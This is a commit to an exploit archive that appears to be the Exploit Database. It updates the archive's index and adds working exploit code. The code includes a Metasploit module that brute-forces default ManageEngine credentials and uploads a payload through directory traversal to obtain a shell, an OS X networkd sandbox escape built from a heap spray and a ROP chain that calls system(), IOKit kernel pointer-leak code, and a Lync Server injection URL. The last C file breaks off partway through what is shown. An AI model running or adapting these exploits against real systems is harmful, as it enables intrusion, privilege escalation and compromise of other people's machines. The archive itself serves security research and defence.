Update: 2015-01-22

20 new exploits
This commit is contained in:
Offensive Security 2015-01-22 08:36:41 +00:00
parent 66b6bb6da3
commit cdb1e00bef
21 changed files with 1702 additions and 2 deletions

View file

@ -27253,7 +27253,7 @@ id,file,description,date,author,platform,type,port
30401,platforms/php/dos/30401.php,"T1lib intT1_Env_GetCompletePath Buffer Overflow Vulnerability",2007-07-26,r0ut3r,php,dos,0
30402,platforms/asp/webapps/30402.txt,"Nukedit 4.9.x Login.ASP Cross-Site Scripting Vulnerability",2007-07-26,d3hydr8,asp,webapps,0
30403,platforms/php/webapps/30403.txt,"WordPress WP-FeedStats 2.1 HTML Injection Vulnerability",2007-07-26,"David Kierznowski",php,webapps,0
30404,platforms/windows/remote/30404.html,"Yahoo! Widgets Engine 4.0.3 YDPCTL.DLL ActiveX Control Buffer Overflow Vulnerability",2007-07-27,"Parvez Anwar",windows,remote,0
30404,platforms/windows/remote/30404.html,"Yahoo! Widgets Engine 4.0.3 YDPCTL.DLL ActiveX Control Buffer Overflow Vulnerability",2007-07-27,Unknown,windows,remote,0
30405,platforms/php/webapps/30405.txt,"Bandersnatch 0.4 - Multiple Input Validation Vulnerabilities",2007-07-27,"Tim Brown",php,webapps,0
30408,platforms/php/webapps/30408.txt,"Jenkins 1.523 - Inject Persistent HTML Code",2013-12-18,"Christian Catalano",php,webapps,0
30409,platforms/php/webapps/30409.txt,"SonarQube Jenkins Plugin - Plain Text Password",2013-12-18,"Christian Catalano",php,webapps,0
@ -27391,7 +27391,7 @@ id,file,description,date,author,platform,type,port
30558,platforms/php/webapps/30558.txt,"Claroline 1.x admin/advancedUserSearch.php action Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0
30559,platforms/php/webapps/30559.txt,"Claroline 1.x admin/campusProblem.php view Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0
30560,platforms/php/webapps/30560.txt,"212cafe Webboard 6.30 Read.PHP SQL Injection Vulnerability",2007-09-04,"Lopez Bran Digrap",php,webapps,0
30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,"Parvez Anwar",windows,remote,0
30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,Unknown,windows,remote,0
30563,platforms/jsp/webapps/30563.txt,"Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability",2007-09-04,"Tushar Vartak",jsp,webapps,0
30564,platforms/asp/webapps/30564.txt,"E-Smart Cart 1.0 Login.ASP SQL Injection Vulnerability",2007-09-04,SmOk3,asp,webapps,0
30565,platforms/windows/remote/30565.pl,"AkkyWareHOUSE 7-zip32.dll 4.42 Heap-Based Buffer Overflow Vulnerability",2007-09-04,miyy3t,windows,remote,0
@ -32274,6 +32274,7 @@ id,file,description,date,author,platform,type,port
35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 'expand' Parameter Cross Site Scripting Vulnerability",2011-06-01,"Stefan Schurtz",multiple,remote,0
35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 'range' Parameter SQL Injection Vulnerability",2011-06-02,"Gjoko Krstic",php,webapps,0
35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0
35821,platforms/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",windows,local,0
35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0
35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 'sortorder' Parameter Cross Site Scripting Vulnerability",2011-06-06,Mr.ThieF,php,webapps,0
35826,platforms/php/webapps/35826.txt,"Joomla CCBoard SQL Injection and Arbitrary File Upload Vulnerabilities",2011-06-06,KedAns-Dz,php,webapps,0
@ -32283,3 +32284,22 @@ id,file,description,date,author,platform,type,port
35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 'colour_picker.php' Cross Site Scripting Vulnerability",2011-06-06,"Patrick Webster",php,webapps,0
35833,platforms/php/webapps/35833.txt,"Xataface 1.x 'action' Parameter Local File Include Vulnerability",2011-06-07,ITSecTeam,php,webapps,0
35834,platforms/php/webapps/35834.txt,"BLOG:CMS 4.2 Multiple Cross Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0
35835,platforms/php/webapps/35835.txt,"WordPress GD Star Rating Plugin 'votes' Parameter SQL Injection Vulnerability",2011-06-08,anonymous,php,webapps,0
35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module 'results()' Security Bypass Vulnerability",2011-06-08,dst,linux,remote,0
35837,platforms/php/webapps/35837.html,"The Pacer Edition CMS 2.1 'email' Parameter Cross Site Scripting Vulnerability",2011-06-07,LiquidWorm,php,webapps,0
35838,platforms/php/webapps/35838.txt,"Tolinet Agencia 'id' Parameter SQL Injection Vulnerability",2011-06-10,"Andrea Bocchetti",php,webapps,0
35839,platforms/php/webapps/35839.txt,"Joomla Minitek FAQ Book 1.3 'id' Parameter SQL Injection Vulnerability",2011-06-13,kaMtiEz,php,webapps,0
35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80
35841,platforms/windows/remote/35841.txt,"Bsplayer 2.68 - HTTP Response Buffer Overflow",2015-01-20,"Fady Mohammed Osman",windows,remote,0
35842,platforms/windows/dos/35842.c,"MalwareBytes Anti-Exploit 1.03.1.1220, 1.04.1.1012 Out-of-bounds Read DoS",2015-01-20,"Parvez Anwar",windows,dos,0
35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products Authenticated File Upload",2015-01-20,metasploit,java,remote,8080
35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80
35847,platforms/osx/local/35847.c,"OS X networkd ""effective_audit_token"" XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0
35848,platforms/osx/local/35848.c,"OS X 10.9.5 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0
35849,platforms/osx/dos/35849.c,"OS X 10.10 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,dos,0
35850,platforms/windows/local/35850.bat,"Microsoft Windows XP 'tskill' Local Privilege Escalation Vulnerability",2011-06-13,"Todor Donev",windows,local,0
35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 'user' and 'pass' SQL Injection Vulnerabilities",2011-06-13,pentesters.ir,php,webapps,0
35852,platforms/asp/webapps/35852.txt,"Microsoft Lync Server 2010 'ReachJoin.aspx' Remote Command Injection Vulnerability",2011-06-13,"Mark Lachniet",asp,webapps,0
35853,platforms/php/webapps/35853.php,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (1)",2011-06-13,pentesters.ir,php,webapps,0
35854,platforms/php/webapps/35854.pl,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (2)",2011-06-13,pentesters.ir,php,webapps,0
35855,platforms/php/remote/35855.txt,"PHP <= 5.3.6 Security Bypass Vulnerability",2011-06-14,"Krzysztof Kotowicz",php,remote,0

Can't render this file because it is too large.

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48235/info
Microsoft Lync Server 2010 is prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers can exploit this issue to execute arbitrary commands in the context of the application.
Microsoft Lync Server 2010 version 4.0.7577.0 is vulnerable; other versions may also be affected.
https://www.example.com/Reach/Client/WebPages/ReachJoin.aspx?xml=&&reachLocale=en-us%22;var%20xxx=%22http://www.foofus.net/~bede/foofuslogo.jpg%22;open%28xxx%29;alert%28%22error,%20please%20enable%20popups%20from%20this%20server%20and%20reload%20from%20the%20link%20you%20were%20given%22%29//

437
platforms/java/remote/35845.rb Executable file
View file

@ -0,0 +1,437 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Multiple Products Authenticated File Upload',
'Description' => %q{
This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,
AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts
the upload does not handle correctly '../' sequences, which can be abused to write
in the file system. Authentication is needed to exploit this vulnerability, but this module
will attempt to login using the default credentials for the administrator and guest
accounts. Alternatively you can provide a pre-authenticated cookie or a username / password
combo. For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400). All
versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer,
SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this
module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been
been tested successfully in Windows and Linux on several versions.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability Discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-5301'],
['OSVDB', '116733'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'],
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5']
],
'DefaultOptions' => { 'WfsDelay' => 30 },
'Privileged' => false, # Privileged on Windows but not on Linux targets
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Automatic', { } ],
[ 'ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9',
{
'attachment_path' => '/workorder/Attachment.jsp'
}
],
[ 'ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1',
{
'attachment_path' => '/common/FileAttachment.jsp'
}
],
[ 'IT360 v8-v10.4',
{
'attachment_path' => '/common/FileAttachment.jsp'
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 15 2014'))
register_options(
[
Opt::RPORT(8080),
OptString.new('JSESSIONID',
[false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']),
OptString.new('IAMAGENTTICKET',
[false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
OptString.new('USERNAME',
[true, 'The username to login as', 'guest']),
OptString.new('PASSWORD',
[true, 'Password for the specified username', 'guest']),
OptString.new('DOMAIN_NAME',
[false, 'Name of the domain to logon to'])
], self.class)
end
def get_version
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
# Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenterl; it = it360)
version = [ 9999, 9999, 0, 'sd' ]
if res && res.code == 200
if res.body.to_s =~ /ManageEngine ServiceDesk/
if res.body.to_s =~ /&nbsp;&nbsp;\|&nbsp;&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/
output = $1
version = [output[0].to_i, output[2].to_i, '0', 'sd']
end
if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/ # newer builds
version[2] = $1.to_i
elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/ # older builds
version[2] = $1.to_i
end
elsif res.body.to_s =~ /ManageEngine AssetExplorer/
if res.body.to_s =~ /ManageEngine AssetExplorer &nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ ||
res.body.to_s =~ /<div class="login-versioninfo">version&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
output = $1
version = [output[0].to_i, output[2].to_i, 0, 'ae']
end
if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/
version[2] = $1.to_i
end
elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/
# All of the vulnerable sc installations are "old style", so we don't care about the major / minor version
version[3] = 'sc'
if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
# ... but get the build number if we can find it
version[2] = $1.to_i
end
elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/
# IT360 newer versions
version[3] = 'it'
end
elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
# IT360 older versions, not a very good detection string but there is no alternative?
version[3] = 'it'
end
version
end
def check
version = get_version
# TODO: put fixed version on the two ifs below once (if...) products are fixed
# sd was fixed on build 9031
# ae and sc still not fixed
if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == 'sd') ||
(version[0] <= 6 && version[2] < 99999 && version[3] == 'ae') ||
(version[3] == 'sc' && version[2] < 99999)
return Exploit::CheckCode::Appears
end
if (version[2] > 9030 && version[3] == 'sd') ||
(version[2] > 99999 && version[3] == 'ae') ||
(version[2] > 99999 && version[3] == 'sc')
return Exploit::CheckCode::Safe
else
# An IT360 check always lands here, there is no way to get the version easily
return Exploit::CheckCode::Unknown
end
end
def authenticate_it360(port, path, username, password)
if datastore['DOMAIN_NAME'] == nil
vars_post = {
'LOGIN_ID' => username,
'PASSWORD' => password,
'isADEnabled' => 'false'
}
else
vars_post = {
'LOGIN_ID' => username,
'PASSWORD' => password,
'isADEnabled' => 'true',
'domainName' => datastore['DOMAIN_NAME']
}
end
res = send_request_cgi({
'rport' => port,
'method' => 'POST',
'uri' => normalize_uri(path),
'vars_get' => {
'service' => 'ServiceDesk',
'furl' => '/',
'timestamp' => Time.now.to_i
},
'vars_post' => vars_post
})
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
# /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
return res.get_cookies
else
return nil
end
end
def get_it360_cookie_name
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("/")
})
cookie = res.get_cookies
if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
return $1
else
return nil
end
end
def login_it360
# Do we already have a valid cookie? If yes, just return that.
if datastore['IAMAGENTTICKET']
cookie_name = get_it360_cookie_name
cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
return cookie
end
# get the correct path, host and port
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/')
})
if res && res.redirect?
uri = [ res.redirection.port, res.redirection.path ]
else
return nil
end
cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
if cookie != nil
return cookie
elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
# we've tried with the default guest password, now let's try with the default admin password
cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator')
if cookie != nil
return cookie
else
# Try one more time with the default admin login for some versions
cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin')
if cookie != nil
return cookie
end
end
end
nil
end
#
# Authenticate and validate our session cookie. We need to submit credentials to
# j_security_check and then follow the redirect to HomePage.do to create a valid
# authenticated session.
#
def authenticate(cookie, username, password)
res = send_request_cgi!({
'method' => 'POST',
'uri' => normalize_uri('/j_security_check;' + cookie.to_s.gsub(';', '')),
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => cookie,
'vars_post' => {
'j_username' => username,
'j_password' => password,
'logonDomainName' => datastore['DOMAIN_NAME']
}
})
if res && (res.code == 302 || (res.code == 200 && res.body.to_s =~ /redirectTo="\+'HomePage\.do';/))
# sd and ae respond with 302 while sc responds with a 200
return true
else
return false
end
end
def login
# Do we already have a valid cookie? If yes, just return that.
if datastore['JSESSIONID'] != nil
cookie = 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';'
return cookie
end
# First we get a valid JSESSIONID to pass to authenticate()
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/')
})
if res && res.code == 200
cookie = res.get_cookies
authenticated = authenticate(cookie, datastore['USERNAME'], datastore['PASSWORD'])
if authenticated
return cookie
elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
# we've tried with the default guest password, now let's try with the default admin password
authenticated = authenticate(cookie, 'administrator', 'administrator')
if authenticated
return cookie
else
# Try one more time with the default admin login for some versions
authenticated = authenticate(cookie, 'admin', 'admin')
if authenticated
return cookie
end
end
end
end
nil
end
def send_multipart_request(cookie, payload_name, payload_str)
if payload_name =~ /\.ear/
upload_path = '../../server/default/deploy'
else
upload_path = rand_text_alpha(4+rand(4))
end
post_data = Rex::MIME::Message.new
if @my_target == targets[1]
# old style
post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
post_data.add_part(payload_name, nil, nil, "form-data; name=\"filename\"")
post_data.add_part('', nil, nil, "form-data; name=\"vecPath\"")
post_data.add_part('', nil, nil, "form-data; name=\"vec\"")
post_data.add_part('AttachFile', nil, nil, "form-data; name=\"theSubmit\"")
post_data.add_part('WorkOrderForm', nil, nil, "form-data; name=\"formName\"")
post_data.add_part(upload_path, nil, nil, "form-data; name=\"component\"")
post_data.add_part('Attach', nil, nil, "form-data; name=\"ATTACH\"")
else
post_data.add_part(upload_path, nil, nil, "form-data; name=\"module\"")
post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
post_data.add_part('', nil, nil, "form-data; name=\"att_desc\"")
end
data = post_data.to_s
res = send_request_cgi({
'uri' => normalize_uri(@my_target['attachment_path']),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => cookie
})
return res
end
def pick_target
return target if target.name != 'Automatic'
version = get_version
if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') ||
(version[0] == 4 && version[3] == 'ae') ||
(version[3] == 'sc')
# These are all "old style" versions (sc is always old style)
return targets[1]
elsif version[3] == 'it'
return targets[3]
else
return targets[2]
end
end
def exploit
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
end
print_status("#{peer} - Selecting target...")
@my_target = pick_target
print_status("#{peer} - Selected target #{@my_target.name}")
if @my_target == targets[3]
cookie = login_it360
else
cookie = login
end
if cookie.nil?
fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
end
# First we generate the WAR with the payload...
war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
war_payload = payload.encoded_war({ :app_name => war_app_base })
# ... and then we create an EAR file that will contain it.
ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
app_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
app_xml << '<application>'
app_xml << "<display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name>"
app_xml << "<module><web><web-uri>#{war_app_base + ".war"}</web-uri>"
app_xml << "<context-root>/#{ear_app_base}</context-root></web></module></application>"
# Zipping with CM_STORE to avoid errors while decompressing the zip
# in the Java vulnerable application
ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
ear_file.add_file(war_app_base + '.war', war_payload.to_s)
ear_file.add_file('META-INF/application.xml', app_xml)
ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.ear'
if @my_target != targets[3]
# Linux doesn't like it when we traverse non existing directories,
# so let's create them by sending some random data before the EAR.
# (IT360 does not have a Linux version so we skip the bogus file for it)
print_status("#{peer} - Uploading bogus file...")
res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4)))
if res && res.code != 200
fail_with(Exploit::Failure::Unknown, "#{peer} - Bogus file upload failed")
end
end
# Now send the actual payload
print_status("#{peer} - Uploading EAR file...")
res = send_multipart_request(cookie, ear_file_name, ear_file.pack)
if res && res.code == 200
print_status("#{peer} - Upload appears to have been successful")
else
fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed")
end
10.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi({
'uri' => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
end

27
platforms/linux/remote/35836.pl Executable file
View file

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/48167/info
The Perl Data::FormValidator module is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and obtain potentially sensitive information.
Data::FormValidator 4.66 is vulnerable; other versions may also be affected.
#!/opt/perl/5.12/bin/perl
use strict;
use warnings;
use Data::FormValidator;
"some_unrelated_string" =~ m/^.*$/;
my $profile = {
untaint_all_constraints => 1,
required => [qw(a)],
constraint_methods => {
a => qr/will_never_match/,
},
};
my $results = Data::FormValidator->check({ a => 1 }, $profile);
warn $results->valid('a');

46
platforms/osx/dos/35849.c Executable file
View file

@ -0,0 +1,46 @@
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <IOKit/IOKitLib.h>
int main(){
kern_return_t err;
CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
if(!matching){
printf("unable to create service matching dictionary\n");
return 0;
}
io_iterator_t iterator;
err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
if (err != KERN_SUCCESS){
printf("no matches\n");
return 0;
}
io_service_t service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
printf("got service: %x\n", service);
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), 2, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}else{
printf("got userclient connection: %x\n", conn);
}
mach_vm_address_t addr = 0x414100000000;
mach_vm_size_t size = 0x1000;
err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
return 0;
}

185
platforms/osx/local/35847.c Executable file
View file

@ -0,0 +1,185 @@
// Requires Lorgnette: https://github.com/rodionovd/liblorgnette
// clang -o networkd_exploit networkd_exploit.c liblorgnette/lorgnette.c -framework CoreFoundation
// ianbeer
#include <dlfcn.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <xpc/xpc.h>
#include <CoreFoundation/CoreFoundation.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/task.h>
#include <mach-o/dyld_images.h>
#include "liblorgnette/lorgnette.h"
/* find the base address of CoreFoundation for the ROP gadgets */
void* find_library_load_address(const char* library_name){
kern_return_t err;
// get the list of all loaded modules from dyld
// the task_info mach API will get the address of the dyld all_image_info struct for the given task
// from which we can get the names and load addresses of all modules
task_dyld_info_data_t task_dyld_info;
mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;
err = task_info(mach_task_self(), TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count);
const struct dyld_all_image_infos* all_image_infos = (const struct dyld_all_image_infos*)task_dyld_info.all_image_info_addr;
const struct dyld_image_info* image_infos = all_image_infos->infoArray;
for(size_t i = 0; i < all_image_infos->infoArrayCount; i++){
const char* image_name = image_infos[i].imageFilePath;
mach_vm_address_t image_load_address = (mach_vm_address_t)image_infos[i].imageLoadAddress;
if (strstr(image_name, library_name)){
return (void*)image_load_address;
}
}
return NULL;
}
struct heap_spray {
void* fake_objc_class_ptr; // -------+
uint8_t pad0[0x10]; // |
uint64_t first_gadget; // |
uint8_t pad1[0x8]; // |
uint64_t null0; // |
uint64_t pad3; // |
uint64_t pop_rdi_rbp_ret; // |
uint64_t rdi; // |
uint64_t rbp; // |
uint64_t system; // |
struct fake_objc_class_t { // |
char pad[0x10]; // <----------+
void* cache_buckets_ptr; //--------+
uint64_t cache_bucket_mask; // |
} fake_objc_class; // |
struct fake_cache_bucket_t { // |
void* cached_sel; // <--------+ //point to the right selector
void* cached_function; // will be RIP :)
} fake_cache_bucket;
char command[256];
};
xpc_connection_t connect(){
xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.networkd", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
xpc_type_t t = xpc_get_type(event);
if (t == XPC_TYPE_ERROR){
printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
}
printf("received an event\n");
});
xpc_connection_resume(conn);
return conn;
}
void go(){
void* heap_spray_target_addr = (void*)0x120202000;
struct heap_spray* hs = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0);
memset(hs, 'C', 0x1000);
hs->null0 = 0;
hs->fake_objc_class_ptr = &hs->fake_objc_class;
hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket;
hs->fake_objc_class.cache_bucket_mask = 0;
// nasty hack to find the correct selector address :)
uint8_t* ptr = (uint8_t*)lorgnette_lookup(mach_task_self(), "_dispatch_objc_release");
uint64_t* msgrefs = ptr + 0x1a + (*(int32_t*)(ptr+0x16)); //offset of rip-relative offset of selector
uint64_t sel = msgrefs[1];
printf("%p\n", sel);
hs->fake_cache_bucket.cached_sel = sel;
uint8_t* CoreFoundation_base = find_library_load_address("CoreFoundation");
// pivot:
/*
push rax
add eax, [rax]
add [rbx+0x41], bl
pop rsp
pop r14
pop r15
pop rbp
ret
*/
hs->fake_cache_bucket.cached_function = CoreFoundation_base + 0x46ef0; //0x414142424343; // ROP from here
// jump over the NULL then so there's more space:
//pop, pop, pop, ret: //and keep stack correctly aligned
hs->first_gadget = CoreFoundation_base + 0x46ef7;
hs->pop_rdi_rbp_ret = CoreFoundation_base + 0x2226;
hs->system = dlsym(RTLD_DEFAULT, "system");
hs->rdi = &hs->command;
strcpy(hs->command, "touch /tmp/hello_networkd");
size_t heap_spray_pages = 0x40000;
size_t heap_spray_bytes = heap_spray_pages * 0x1000;
char* heap_spray_copies = malloc(heap_spray_bytes);
for (int i = 0; i < heap_spray_pages; i++){
memcpy(heap_spray_copies+(i*0x1000), hs, 0x1000);
}
xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_data(msg, "heap_spray", heap_spray_copies, heap_spray_bytes);
xpc_dictionary_set_uint64(msg, "type", 6);
xpc_dictionary_set_uint64(msg, "connection_id", 1);
xpc_object_t params = xpc_dictionary_create(NULL, NULL, 0);
xpc_object_t conn_list = xpc_array_create(NULL, 0);
xpc_object_t arr_dict = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_string(arr_dict, "hostname", "example.com");
xpc_array_append_value(conn_list, arr_dict);
xpc_dictionary_set_value(params, "connection_entry_list", conn_list);
char* long_key = malloc(1024);
memset(long_key, 'A', 1023);
long_key[1023] = '\x00';
xpc_dictionary_set_string(params, long_key, "something or other that's not important");
uint64_t uuid[] = {0, 0x120200000};
xpc_dictionary_set_uuid(params, "effective_audit_token", (const unsigned char*)uuid);
xpc_dictionary_set_uint64(params, "start", 0);
xpc_dictionary_set_uint64(params, "duration", 0);
xpc_dictionary_set_value(msg, "parameters", params);
xpc_object_t state = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_int64(state, "power_slot", 0);
xpc_dictionary_set_value(msg, "state", state);
xpc_object_t conn = connect();
printf("connected\n");
xpc_connection_send_message(conn, msg);
printf("enqueued message\n");
xpc_connection_send_barrier(conn, ^{printf("other side has enqueued this message\n");});
xpc_release(msg);
}
int main(){
go();
printf("entering CFRunLoop\n");
for(;;){
CFRunLoopRunInMode(kCFRunLoopDefaultMode, DBL_MAX, TRUE);
}
return 0;
}

323
platforms/osx/local/35848.c Executable file
View file

@ -0,0 +1,323 @@
// clang -o ig_2_3_exploit ig_2_3_exploit.c -framework IOKit -framework CoreFoundation -m32 -D_FORTIFY_SOURCE=0
// ianbeer
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <CoreFoundation/CoreFoundation.h>
#include <IOKit/IOKitLib.h>
uint64_t kernel_symbol(char* sym){
char cmd[1024];
strcpy(cmd, "nm -g /mach_kernel | grep ");
strcat(cmd, sym);
strcat(cmd, " | cut -d' ' -f1");
FILE* f = popen(cmd, "r");
char offset_str[17];
fread(offset_str, 16, 1, f);
pclose(f);
offset_str[16] = '\x00';
uint64_t offset = strtoull(offset_str, NULL, 16);
return offset;
}
uint64_t leaked_offset_in_kext(){
FILE* f = popen("nm -g /System/Library/Extensions/IONDRVSupport.kext/IONDRVSupport | grep __ZTV17IONDRVFramebuffer | cut -d' ' -f1", "r");
char offset_str[17];
fread(offset_str, 16, 1, f);
pclose(f);
offset_str[16] = '\x00';
uint64_t offset = strtoull(offset_str, NULL, 16);
offset += 0x10; //offset from symbol to leaked pointer
return offset;
}
uint64_t leak(){
io_iterator_t iter;
CFTypeRef p = IORegistryEntrySearchCFProperty(IORegistryGetRootEntry(kIOMasterPortDefault),
kIOServicePlane,
CFSTR("AAPL,iokit-ndrv"),
kCFAllocatorDefault,
kIORegistryIterateRecursively);
if (CFGetTypeID(p) != CFDataGetTypeID()){
printf("expected CFData\n");
return 1;
}
if (CFDataGetLength(p) != 8){
printf("expected 8 bytes\n");
return 1;
}
uint64_t leaked = *((uint64_t*)CFDataGetBytePtr(p));
return leaked;
}
